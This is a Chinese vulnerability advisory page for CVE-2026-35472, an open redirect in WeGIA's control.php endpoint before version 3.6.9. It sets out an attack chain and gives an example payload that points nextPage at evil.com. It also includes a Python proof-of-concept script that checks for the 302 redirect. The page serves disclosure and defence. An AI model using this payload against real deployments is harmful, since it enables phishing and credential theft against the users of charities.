IPBUF安全漏洞报告
English
CVE-2026-35472 CVSS 6.1 中危

CVE-2026-35472 WeGIA开放重定向漏洞

披露日期: 2026-04-06
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-35472
漏洞类型
开放重定向
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
WeGIA

相关标签

开放重定向WeGIACWE-601网络钓鱼CVSS-6.1

漏洞概述

WeGIA是一款用于慈善机构的Web管理系统。在3.6.9版本之前,该应用程序的/WeGIA/controle/control.php端点存在开放重定向漏洞。具体而言,当metodo参数为listarTodos且nomeClasse参数为EstoqueControle时,应用程序未能正确验证或限制nextPage参数。这使得攻击者能够利用受信任的WeGIA域名将用户重定向到任意外部网站。该漏洞可被滥用于网络钓鱼、凭据窃取、恶意软件分发以及社会工程学攻击。目前该问题已在3.6.9版本中修复。

技术细节

该漏洞属于典型的开放重定向(Open Redirect)漏洞,位于WeGIA应用的/WeGIA/controle/control.php接口中。漏洞产生的根本原因是应用程序在处理HTTP请求时,未对用户输入的nextPage参数进行严格的校验、过滤或白名单限制,直接将其用于构建302重定向响应头Location。

触发该漏洞需要特定的参数组合:metodo=listarTodos和nomeClasse=EstoqueControle。攻击者可以构造包含恶意URL的nextPage参数(如nextPage=https://evil.com)。当受害者点击构造好的链接时,服务器会响应重定向指令,将受害者引导至攻击者控制的站点。由于重定向发起自受信任的WeGIA域名,普通用户往往难以察觉URL的跳转行为,从而极大地降低了网络钓鱼攻击的门槛。根据CVSS 3.1评分,该漏洞利用复杂度低,无需用户认证,但需要受害者进行交互(如点击链接)才能完成攻击。

攻击链分析

STEP 1
侦察
攻击者识别出目标正在使用WeGIA系统,且版本低于3.6.9。
STEP 2
武器化
攻击者构造一个恶意的URL,在WeGIA的control.php接口中注入nextPage参数,指向其控制的钓鱼网站。
STEP 3
交付
攻击者通过电子邮件或社交媒体将包含恶意链接的信息发送给目标用户,诱导其点击。
STEP 4
利用
受害者点击链接,WeGIA服务器响应302重定向,由于域名受信任,受害者浏览器自动跳转至攻击者的钓鱼站点。
STEP 5
达成目标
受害者在钓鱼页面输入敏感信息(如账号密码),导致凭证泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 # PoC for CVE-2026-35472 (WeGIA Open Redirect) import requests def check_open_redirect(target_url): """ Tests the WeGIA open redirect vulnerability. """ # The vulnerable endpoint endpoint = "/WeGIA/controle/control.php" # Parameters required to trigger the vulnerability based on the description # metodo=listarTodos and nomeClasse=EstoqueControle # nextPage is the vulnerable parameter params = { "metodo": "listarTodos", "nomeClasse": "EstoqueControle", "nextPage": "https://example.com" # Replace with attacker's site } try: # Send the request # allow_redirects=False is crucial to see the 302 response response = requests.get(target_url + endpoint, params=params, allow_redirects=False, timeout=10) # Check if the response is a redirect (302) if response.status_code == 302: location = response.headers.get('Location') if location and "example.com" in location: print(f"[+] Vulnerability Confirmed!") print(f"[+] Redirecting to: {location}") return True print("[-] Vulnerability not detected or target patched.") return False except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": # Replace with the actual target IP or Domain target = "http://localhost" check_open_redirect(target)

影响范围

WeGIA < 3.6.9

防御指南

临时缓解措施
如果无法立即升级版本,建议在网络边界设备(如WAF)上部署规则,检测并拦截包含外部域名引用的nextPage参数请求。同时,加强对用户的网络安全意识教育,不轻易点击来源不明的链接。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表